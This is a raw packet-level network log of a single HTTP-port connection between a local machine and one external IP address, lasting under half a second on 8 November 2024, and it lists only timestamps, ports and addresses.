Nov 8, 2024 15:20:54.428328037 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.428328037 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.428503990 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428556919 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428611040 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.428653002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428666115 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428675890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428699017 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.428823948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428834915 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428914070 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428930044 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428941965 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428951979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428953886 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.428962946 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.429042101 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.429172993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.429184914 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.429265022 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.448402882 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.448421001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.448432922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.448487043 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.448587894 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.461419106 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.461446047 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.461460114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.461469889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.461483955 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.461513996 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.461544991 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.462225914 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484026909 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484045029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484056950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484124899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484124899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484244108 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484257936 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484268904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484435081 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484447002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484457970 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484460115 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484472036 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484502077 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484555960 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484671116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484680891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484692097 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484756947 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484767914 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484777927 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.484780073 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.484869957 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.485024929 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485034943 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485047102 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485075951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485088110 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485100985 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.485100985 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.485177994 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.485492945 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485503912 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485569000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485577106 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.485584974 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485596895 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485609055 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485620975 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485632896 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.485660076 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.485722065 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.522217035 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.522233009 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.522243977 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.522286892 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.522298098 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.522305012 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.522309065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.522353888 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.547246933 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547261000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547271013 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547283888 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547296047 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547307014 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547331095 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547444105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.547521114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547530890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547584057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547601938 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547605991 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.547615051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547641993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547652960 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547666073 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547673941 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.547673941 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.547683001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547694921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.547710896 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.547741890 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.567275047 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.567287922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.567297935 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.567349911 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.567349911 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.567390919 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.567404985 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.567418098 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.567600012 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.580173969 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.580188036 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.580198050 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.580226898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.580238104 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.580257893 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.580257893 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.580509901 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.591923952 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.602859020 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.602875948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.602937937 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.602952003 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603013039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603024006 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603045940 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603058100 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603075027 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603094101 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603106022 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603183031 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603281021 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603291988 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603305101 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603426933 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603470087 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603481054 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603492022 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603543043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603545904 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603545904 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603557110 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603621960 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.603889942 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603914976 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.603926897 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604015112 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604020119 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.604031086 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604111910 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.604238033 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604253054 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604274988 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604285955 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604298115 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.604310989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604322910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604334116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604341984 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.604345083 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.604363918 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.604537964 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.633366108 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.641150951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641164064 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641175032 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641221046 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641247988 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.641247988 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.641262054 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641272068 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641347885 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641359091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641371012 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.641413927 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.641413927 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.666059017 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666088104 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666100025 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666110039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666143894 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.666239023 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.666296959 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666306973 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666368961 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.666728973 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666841984 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666852951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666862965 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666874886 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666887045 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666897058 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666908979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666918993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.666923046 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.666941881 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.666963100 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.667087078 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.667098045 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.667275906 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.686683893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.686702013 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.686714888 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.686728954 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.686741114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.686744928 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.686772108 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.686836958 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.699234009 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.699251890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.699269056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.699280024 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.699292898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.699317932 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.721971989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.721998930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722012043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722038984 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.722045898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722063065 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.722208977 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722220898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722232103 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722243071 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722255945 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722268105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.722299099 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.722299099 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.722584963 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722598076 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722620964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722632885 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722642899 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.722656012 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.722738028 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723007917 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723020077 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723030090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723067999 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723067999 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723109961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723121881 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723212957 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723261118 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723273993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723355055 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723366022 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723376989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723390102 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723402977 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723408937 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723416090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723423958 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723428965 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723432064 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723481894 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.723874092 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.723929882 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.724173069 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761575937 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761614084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761626005 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761636972 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761646986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.761651993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761665106 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761667013 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.761677980 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761688948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.761707067 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.761707067 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785037041 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785053015 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785064936 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785095930 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785218000 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785306931 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785345078 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785494089 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785538912 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785550117 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785609007 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785659075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785698891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785713911 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785747051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785783052 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785794973 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785825968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785837889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785860062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785876036 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785885096 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785888910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785909891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.785919905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.785972118 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.806009054 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.806025982 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.806050062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.806062937 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.806072950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.806097984 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.806097984 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844362020 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844377041 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844388962 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844399929 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844413996 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844424963 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844432116 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844435930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844448090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844461918 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844461918 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844479084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844502926 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844505072 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844518900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844528913 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844532967 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844546080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844556093 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844558001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844571114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844582081 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844593048 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844594002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844607115 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844616890 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844619036 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844631910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844645023 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844655991 CET	80	49800	185.215.113.16	192.168.2.9
